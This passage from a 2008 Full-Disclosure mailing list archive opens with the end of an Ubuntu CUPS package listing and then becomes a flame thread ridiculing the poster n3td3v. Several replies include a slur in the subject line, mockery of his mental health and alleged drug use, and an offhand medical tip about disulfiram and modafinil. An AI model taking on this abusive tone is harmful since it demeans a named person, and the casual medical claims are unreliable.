      Size/MD5:   139332 c33597e3bbce0d41df0efe84c2b59377
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.8-0ubuntu8.3_i386.deb
      Size/MD5:   178604 a93713bb9b422a0460d42dc35eb7f8b3

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.8-0ubuntu8.3_powerpc.deb
      Size/MD5:    46768 682b1e104c73d8820a5b39ba79de7883
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.8-0ubuntu8.3_powerpc.deb
      Size/MD5:   101104 78dcf70528f5682b2499efa0b03f6a42
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8-0ubuntu8.3_powerpc.deb
      Size/MD5:  1695542 06c8b6b43afa525b07718d410eed6438
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.8-0ubuntu8.3_powerpc.deb
      Size/MD5:    56226 27ce8328e4cfc184ef64fdfe5bcf1b45
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.8-0ubuntu8.3_powerpc.deb
      Size/MD5:   109886 607c9d1bdc4eaf3627031f98f59948be
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.8-0ubuntu8.3_powerpc.deb
      Size/MD5:   141172 501aee8031dd71ce2166e79bfca04129
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.8-0ubuntu8.3_powerpc.deb
      Size/MD5:   188236 ccbcdb277477728c10dac36435924085

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.8-0ubuntu8.3_sparc.deb
      Size/MD5:    37788 7da1fb58e7d4b6bfd71ed47b1ba5d201
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.8-0ubuntu8.3_sparc.deb
      Size/MD5:    83750 69a59033ea6458f3f82046aee46ba4bb
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8-0ubuntu8.3_sparc.deb
      Size/MD5:  1658908 b35167112445c8bc3c1281604412f534
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.8-0ubuntu8.3_sparc.deb
      Size/MD5:    54756 b877de97919e00870c84850b1e074555
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.8-0ubuntu8.3_sparc.deb
      Size/MD5:   103574 204efb55b2d46f00cd4f8ddc429d805f
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.8-0ubuntu8.3_sparc.deb
      Size/MD5:   141742 5e411c3199e1a1296dbd7cd7c6958e1a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.8-0ubuntu8.3_sparc.deb
      Size/MD5:   177884 4e1b218fd113193e4cf149aea90ec6c7

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.6.diff.gz
      Size/MD5:   125298 81ae6b42c7dd12a1797a63d19c644a8c
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.6.dsc
      Size/MD5:     1218 c56faedc440fc2b16f9a1f396a607d1e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2.orig.tar.gz
      Size/MD5:  4848424 9e3e1dee4d872fdff0682041198d3d73

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-common_1.3.2-1ubuntu7.6_all.deb
      Size/MD5:  1080444 5d01f105292a526744e5622a14a9aed4

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.6_amd64.deb
      Size/MD5:    37204 c3425972caa02e7a25321f49d47c6f9b
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.6_amd64.deb
      Size/MD5:    89504 5411f2454e0d2a0323e9951cb15a534d
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.6_amd64.deb
      Size/MD5:  2034570 c8d6548bd1ba7cb841b196e762da492c
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.6_amd64.deb
      Size/MD5:    59890 150d59889adc8fd0cb185989876a355d
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.6_amd64.deb
      Size/MD5:    46780 e15952781e93e862194d453320605bbc
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.6_amd64.deb
      Size/MD5:   152020 32c671873dfad4e39104da5c3a6e935e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.6_amd64.deb
      Size/MD5:   186028 1a1404a7d67078e31c8819bf3d8d4dae

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.6_i386.deb
      Size/MD5:    36476 a982fce3918a91c74e92fb515f1c6d65
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.6_i386.deb
      Size/MD5:    86484 0e4d80917e070f7b2f109de81f96bc4d
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.6_i386.deb
      Size/MD5:  2018116 cff3abb1b69d797d616e73c93885de3a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.6_i386.deb
      Size/MD5:    58634 6d2590c49af04215519a87e857463652
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.6_i386.deb
      Size/MD5:    46140 0ebe76bdf799336e0b2d01d0a0eca72c
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.6_i386.deb
      Size/MD5:   145694 6766e6515de26b782e211840f330b93e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.6_i386.deb
      Size/MD5:   182802 c62bc1107e748c200e6969a239ae8b9b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.6_powerpc.deb
      Size/MD5:    46498 044a54c557dd4006bb40a13dd2c2b156
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.6_powerpc.deb
      Size/MD5:   107752 76e4020feb1778e713389fc6bdb86ea9
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.6_powerpc.deb
      Size/MD5:  2099222 73d517a40d877a238856a232e6be64c9
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.6_powerpc.deb
      Size/MD5:    59342 8530840cf85bf44c8803fd064b61e1f7
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.6_powerpc.deb
      Size/MD5:    51716 9d30c790a4b94ac07670d7e15c2e41ab
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.6_powerpc.deb
      Size/MD5:   146948 f73327e30e2778bdcf4543c04855e6a1
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.6_powerpc.deb
      Size/MD5:   191752 46d534c4c477657ab03419d18f91728f

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.2-1ubuntu7.6_sparc.deb
      Size/MD5:    37564 1771f3f6f2ceb1864696801f7f420e93
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.2-1ubuntu7.6_sparc.deb
      Size/MD5:    89606 69149447dbd4e3b36185bd977202f837
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.2-1ubuntu7.6_sparc.deb
      Size/MD5:  2060610 ed932d7ee05e745bc0af647d361e7d99
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.2-1ubuntu7.6_sparc.deb
      Size/MD5:    57900 7369866ac9adb6abd966e2d1e2f95b42
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.2-1ubuntu7.6_sparc.deb
      Size/MD5:    45440 60eda5d4cc12eb2c35817d6c0d4ef43a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.2-1ubuntu7.6_sparc.deb
      Size/MD5:   148476 8e1d119a91b8c6d8d15032b27a498235
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.2-1ubuntu7.6_sparc.deb
      Size/MD5:   181842 8283739361474f00d65f9bf52d7c0e3d


-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080402/ccd3dcfe/attachment.bin 

From hermens.p at gmail.com  Thu Apr  3 00:37:44 2008
From: hermens.p at gmail.com (Pat)
Date: Thu, 3 Apr 2008 10:37:44 +1100
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference
	spamming its fucking gay
In-Reply-To: <4b6ee9310804021609x6d0e9c86l91cfb79806be3f6d@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
	<6158bb410804021542l39618e7bnf1ad121023511ec8@mail.gmail.com>
	<4b6ee9310804021609x6d0e9c86l91cfb79806be3f6d@mail.gmail.com>
Message-ID: <f67054650804021637s7bdba0a3hff9cb796853de229@mail.gmail.com>

Imagine if n3td3v post to *every* mailing list and not just *one*, would you
not get tired and frustrated?

Sorry mate, I already am.

Want to talk about SPAM? I have about 12 emails from YOU this morning, and
every single one of them is talking about how you're busy contributing to
this and that and the much hyped Storm worm crap.

Please go do something, stop emailing everyone about how cool you are.

On 03/04/2008, n3td3v <xploitable at gmail.com> wrote:
>
> On Wed, Apr 2, 2008 at 11:42 PM, Ureleet <ureleet at gmail.com> wrote:
> > "Full-Disclosure, I want action taken on the *growing* amount of
> >  security conference spam."
> >
> >  u do know that just because you demand or want action taken that it
> >  doesn't mean that such will take place right?
> >
> >  stop trolling.
>
>
> I'm not trolling if I want a security conference mailing list setup so
> the rest of us don't need to suffer an inbox of 20 identical
> commerical *come to our conference, or, book our training*.
>
> This is a big issue, and if we dont create a mailing list for it, next
> year we won't have 20 duplicates per spam run, we'll have 40 per spam
> run.
>
> Imagine if n3td3v post to *every* mailing list and not just *one*,
> would you not get tired and frustrated?
>
> All the best,
>
>
> n3td3v
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080403/7786e2da/attachment.html 

From ureleet at gmail.com  Thu Apr  3 01:13:28 2008
From: ureleet at gmail.com (Ureleet)
Date: Wed, 2 Apr 2008 20:13:28 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference
	spamming its fucking gay
In-Reply-To: <3a166c090804021556v7799dfc8n9202438920250548@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
	<6158bb410804021542l39618e7bnf1ad121023511ec8@mail.gmail.com>
	<3a166c090804021556v7799dfc8n9202438920250548@mail.gmail.com>
Message-ID: <6158bb410804021713l4308360bp9b94e6390f782ebb@mail.gmail.com>

lets look at it from a marketing point of view.  not everyone is going
to be on the conference mailing list.  more people are going to be on
security mailing lists.  i understand your point of view, but it just
wont work.  Use common sense.

On Wed, Apr 2, 2008 at 6:56 PM, n3td3v <n3td3v at gmail.com> wrote:
>
> On Wed, Apr 2, 2008 at 11:42 PM, Ureleet <ureleet at gmail.com> wrote:
>  > "Full-Disclosure, I want action taken on the *growing* amount of
>  >  security conference spam."
>  >
>  >  u do know that just because you demand or want action taken that it
>  >  doesn't mean that such will take place right?
>  >
>  >  stop trolling.
>
>  I'm not trolling if I want a security conference mailing list setup so
>  the rest of us don't need to suffer an inbox of 20 identical
>  commerical *come to our conference, or, book our training*.
>
>  This is a big issue, and if we dont create a mailing list for it, next
>  year we won't have 20 duplicates per spam run, we'll have 40 per spam
>  run.
>
>  Imagine if n3td3v post to *every* mailing list and not just *one*,
>  would you not get tired and frustrated?
>
>  All the best,
>
>  n3td3v
>



From ureleet at gmail.com  Thu Apr  3 01:15:39 2008
From: ureleet at gmail.com (Ureleet)
Date: Wed, 2 Apr 2008 20:15:39 -0400
Subject: [Full-disclosure] n3td3v has a fan
In-Reply-To: <4b6ee9310804021613n628cd00bj706125788bff60de@mail.gmail.com>
References: <6158bb410804021546q1bd945d4ydb0eb50c0e900aee@mail.gmail.com>
	<4b6ee9310804021613n628cd00bj706125788bff60de@mail.gmail.com>
Message-ID: <6158bb410804021715l29dafd00i1ba25ca63eb723bd@mail.gmail.com>

you are the one bragging about making a difference, all i see is you being
annoying.  but i don't know ur full history on the mailing list, but from
what i see, its not very positive.
and am i annoying everyone?  or just you.  speaking about stopping the storm
worm and trying to stop the storm worm are two different things.

On Wed, Apr 2, 2008 at 7:13 PM, n3td3v <xploitable at gmail.com> wrote:
> On Wed, Apr 2, 2008 at 11:46 PM, Ureleet <ureleet at gmail.com> wrote:
>  > you like him because he posts ur articles.
>  >
>  >  you can have him.
>  >
>  >  stop trolling.
>
>  I'm the one at the forefront of security trying to make a difference,
>  and what are you? He supports me because of my cause to stop the Storm
>  Worm, so what solutions have you got, instead of annoying everyone?
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080402/1319b46b/attachment.html 

From Valdis.Kletnieks at vt.edu  Thu Apr  3 03:17:59 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 02 Apr 2008 22:17:59 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference
	spamming its fucking gay
In-Reply-To: Your message of "Wed, 02 Apr 2008 23:33:50 BST."
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
Message-ID: <27886.1207189079@turing-police.cc.vt.edu>

On Wed, 02 Apr 2008 23:33:50 BST, n3td3v said:
> the big main mailing lists a day or so before. What happens is, folks who
> are good at security, and are subscribed to all the mailing lists, get an
> inbox flooded with duplicate security conference spam, and people aren't
> even interested.

You only get duplicates if you're too unclued to de-dup based on Message-ID:
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080402/69414976/attachment.bin 

From techie.micheal at gmail.com  Thu Apr  3 03:27:00 2008
From: techie.micheal at gmail.com (Micheal Cottingham)
Date: Wed, 2 Apr 2008 22:27:00 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference
	spamming its fucking gay
In-Reply-To: <27886.1207189079@turing-police.cc.vt.edu>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
	<27886.1207189079@turing-police.cc.vt.edu>
Message-ID: <fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>

Am I the only one who is getting annoyed by n3td3v speaking in the
third-person like he's an entity, rather than a single person? I
suggest we all take a moment to psycho-analyze this, rather than
taking time out of our day to do our real jobs. ;)

On Wed, Apr 2, 2008 at 10:17 PM,  <Valdis.Kletnieks at vt.edu> wrote:
> On Wed, 02 Apr 2008 23:33:50 BST, n3td3v said:
>  > the big main mailing lists a day or so before. What happens is, folks who
>  > are good at security, and are subscribed to all the mailing lists, get an
>  > inbox flooded with duplicate security conference spam, and people aren't
>  > even interested.
>
>  You only get duplicates if you're too unclued to de-dup based on Message-ID:
>
> _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From mlande at bellsouth.net  Thu Apr  3 05:27:35 2008
From: mlande at bellsouth.net (Mary Landesman)
Date: Thu, 3 Apr 2008 00:27:35 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass security
	conferencespamming its fucking gay
In-Reply-To: <fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com><d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com><4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com><4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com><27886.1207189079@turing-police.cc.vt.edu>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
Message-ID: <030b01c89543$0b481540$6401a8c0@maryl>

Referring to oneself in the third person can be a symptom of identity
confusion or identity alteration, a subset or trait of dissociation. In
ancient times, it was referred to as demonic possession.

Self-objectification is also a trait of narcissism, perhaps because
narcissists love and feel empowered by (possession of) objects. And what
better object for a narcissist to love than themselves, objectified? Other
traits associated with narcissism are bragging, attention-seeking, delusions
of grandeur, etc. In modern times, I believe it is sometimes referred to as
being a bore.

-- Mary



-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Micheal
Cottingham
Sent: Wednesday, April 02, 2008 10:27 PM
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Fwd: Let's outlaw mass security
conferencespamming its fucking gay

Am I the only one who is getting annoyed by n3td3v speaking in the
third-person like he's an entity, rather than a single person? I suggest we
all take a moment to psycho-analyze this, rather than taking time out of our
day to do our real jobs. ;)

On Wed, Apr 2, 2008 at 10:17 PM,  <Valdis.Kletnieks at vt.edu> wrote:
> On Wed, 02 Apr 2008 23:33:50 BST, n3td3v said:
>  > the big main mailing lists a day or so before. What happens is, 
> folks who  > are good at security, and are subscribed to all the 
> mailing lists, get an  > inbox flooded with duplicate security 
> conference spam, and people aren't  > even interested.
>
>  You only get duplicates if you're too unclued to de-dup based on
Message-ID:
>
> _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From pauls at utdallas.edu  Thu Apr  3 05:40:53 2008
From: pauls at utdallas.edu (Paul Schmehl)
Date: Wed, 02 Apr 2008 23:40:53 -0500
Subject: [Full-disclosure] Fwd: Let's outlaw mass security
 conferencespamming its fucking gay
In-Reply-To: <030b01c89543$0b481540$6401a8c0@maryl>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
	<27886.1207189079@turing-police.cc.vt.edu>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
Message-ID: <C4B44D4D4D0053622A781365@Macintosh.local>

--On April 3, 2008 12:27:35 AM -0400 Mary Landesman <mlande at bellsouth.net> 
wrote:

> Referring to oneself in the third person can be a symptom of identity
> confusion or identity alteration, a subset or trait of dissociation. In
> ancient times, it was referred to as demonic possession.
>
> Self-objectification is also a trait of narcissism, perhaps because
> narcissists love and feel empowered by (possession of) objects. And what
> better object for a narcissist to love than themselves, objectified?
> Other traits associated with narcissism are bragging, attention-seeking,
> delusions of grandeur, etc. In modern times, I believe it is sometimes
> referred to as being a bore.
>

Or boring a bee?

Paul Schmehl (pauls at utdallas.edu)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/



From mikie.simpson at gmail.com  Thu Apr  3 09:11:05 2008
From: mikie.simpson at gmail.com (Michael Simpson)
Date: Thu, 3 Apr 2008 09:11:05 +0100
Subject: [Full-disclosure] Fwd: Let's outlaw mass security
	conferencespamming its fucking gay
In-Reply-To: <C4B44D4D4D0053622A781365@Macintosh.local>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
	<27886.1207189079@turing-police.cc.vt.edu>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
Message-ID: <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>

On 4/3/08, Paul Schmehl <pauls at utdallas.edu> wrote:
> --On April 3, 2008 12:27:35 AM -0400 Mary Landesman <mlande at bellsouth.net>
> wrote:
>
> > Referring to oneself in the third person can be a symptom of identity
> > confusion or identity alteration, a subset or trait of dissociation. In
> > ancient times, it was referred to as demonic possession.
> >
> > Self-objectification is also a trait of narcissism, perhaps because
> > narcissists love and feel empowered by (possession of) objects. And what
> > better object for a narcissist to love than themselves, objectified?
> > Other traits associated with narcissism are bragging, attention-seeking,
> > delusions of grandeur, etc. In modern times, I believe it is sometimes
> > referred to as being a bore.
> >
>
> Or boring a bee?
>
> Paul Schmehl (pauls at utdallas.edu)
> Senior Information Security Analyst
> The University of Texas at Dallas
> http://www.utdallas.edu/ir/security/

As a medic working as a associate specialist in the treatment of
substance misuse disorder for the last few years n3td3v reminds me of
my patients who indulge in polydrug abuse mainly involving cocaine and
alcohol, often in combination.

This is a very dangerous thing to do due to the 2 drugs being combined
by the liver to form cocaethylene which is significantly more euphoric
and hepatotoxic.

-tip i have done some "n of 1" trials with patients showing that
antabuse (disulphiram) can help with this as it seems to inhibit
dopamine decarboxylase in the brain thus raising basal dopamine levels
reducing cravings as well as preventing alcohol use. Modafenil also
seems quite promising for stimulant misuse but my bosses are being
slow about letting me set up a proper double-blind placebo controlled
study of this.

I also think this is why the analysis of n3td3v done previously came
to the conclusion that it was several separate individuals. It is
merely one guy in different states of intoxication.

The evolution of his evolving addiction and deteriorating mental
health has been quite clear over the last few years.

Soon , if he follows the pattern set by many Scots indulging in hard
drug use he will start to use benzodiazepines more and more and if he
is very unlucky he will be exposed to heroin.
At this point he will go away and FD can return to its true nature as
a list for sec matters with occasional furry pr0n spam.

:-)

mike



From razishaban at gmail.com  Thu Apr  3 14:20:32 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Thu, 3 Apr 2008 16:20:32 +0300
Subject: [Full-disclosure] n3td3v has a fan
In-Reply-To: <6158bb410804021715l29dafd00i1ba25ca63eb723bd@mail.gmail.com>
References: <6158bb410804021546q1bd945d4ydb0eb50c0e900aee@mail.gmail.com>
	<4b6ee9310804021613n628cd00bj706125788bff60de@mail.gmail.com>
	<6158bb410804021715l29dafd00i1ba25ca63eb723bd@mail.gmail.com>
Message-ID: <2d792fb20804030620i795b851cu90c69b3f37dd82e5@mail.gmail.com>

Actually, you're representing the opinion of the majority of the list.
n3td3v is undoubtably one of the most annoying posters, with an
amazingly inflated sense of self-worth.


--
Razi

On 4/3/08, Ureleet <ureleet at gmail.com> wrote:
> you are the one bragging about making a difference, all i see is you being
> annoying.  but i don't know ur full history on the mailing list, but from
> what i see, its not very positive.
>
> and am i annoying everyone?  or just you.  speaking about stopping the storm
> worm and trying to stop the storm worm are two different things.
>
> On Wed, Apr 2, 2008 at 7:13 PM, n3td3v <xploitable at gmail.com> wrote:
>  > On Wed, Apr 2, 2008 at 11:46 PM, Ureleet <ureleet at gmail.com> wrote:
> >  > you like him because he posts ur articles.
> >  >
> >  >  you can have him.
>  >  >
> >  >  stop trolling.
> >
> >  I'm the one at the forefront of security trying to make a difference,
> >  and what are you? He supports me because of my cause to stop the Storm
> >  Worm, so what solutions have you got, instead of annoying everyone?
>  >
>
>
> _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From ureleet at gmail.com  Thu Apr  3 14:45:03 2008
From: ureleet at gmail.com (Ureleet)
Date: Thu, 3 Apr 2008 09:45:03 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass security
	conferencespamming its fucking gay
In-Reply-To: <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
	<27886.1207189079@turing-police.cc.vt.edu>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
Message-ID: <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>

or, he's just stupid?
spade equals spade.

On Thu, Apr 3, 2008 at 4:11 AM, Michael Simpson <mikie.simpson at gmail.com>
wrote:

> On 4/3/08, Paul Schmehl <pauls at utdallas.edu> wrote:
> > --On April 3, 2008 12:27:35 AM -0400 Mary Landesman <
> mlande at bellsouth.net>
> > wrote:
> >
> > > Referring to oneself in the third person can be a symptom of identity
> > > confusion or identity alteration, a subset or trait of dissociation.
> In
> > > ancient times, it was referred to as demonic possession.
> > >
> > > Self-objectification is also a trait of narcissism, perhaps because
> > > narcissists love and feel empowered by (possession of) objects. And
> what
> > > better object for a narcissist to love than themselves, objectified?
> > > Other traits associated with narcissism are bragging,
> attention-seeking,
> > > delusions of grandeur, etc. In modern times, I believe it is sometimes
> > > referred to as being a bore.
> > >
> >
> > Or boring a bee?
> >
> > Paul Schmehl (pauls at utdallas.edu)
> > Senior Information Security Analyst
> > The University of Texas at Dallas
> > http://www.utdallas.edu/ir/security/
>
> As a medic working as a associate specialist in the treatment of
> substance misuse disorder for the last few years n3td3v reminds me of
> my patients who indulge in polydrug abuse mainly involving cocaine and
> alcohol, often in combination.
>
> This is a very dangerous thing to do due to the 2 drugs being combined
> by the liver to form cocaethylene which is significantly more euphoric
> and hepatotoxic.
>
> -tip i have done some "n of 1" trials with patients showing that
> antabuse (disulphiram) can help with this as it seems to inhibit
> dopamine decarboxylase in the brain thus raising basal dopamine levels
> reducing cravings as well as preventing alcohol use. Modafenil also
> seems quite promising for stimulant misuse but my bosses are being
> slow about letting me set up a proper double-blind placebo controlled
> study of this.
>
> I also think this is why the analysis of n3td3v done previously came
> to the conclusion that it was several separate individuals. It is
> merely one guy in different states of intoxication.
>
> The evolution of his evolving addiction and deteriorating mental
> health has been quite clear over the last few years.
>
> Soon , if he follows the pattern set by many Scots indulging in hard
> drug use he will start to use benzodiazepines more and more and if he
> is very unlucky he will be exposed to heroin.
> At this point he will go away and FD can return to its true nature as
> a list for sec matters with occasional furry pr0n spam.
>
> :-)
>
> mike
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080403/593dabca/attachment.html 

From ihasshovel at gmail.com  Thu Apr  3 14:58:14 2008
From: ihasshovel at gmail.com (DUDE DUDERINO)
Date: Thu, 3 Apr 2008 09:58:14 -0400
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
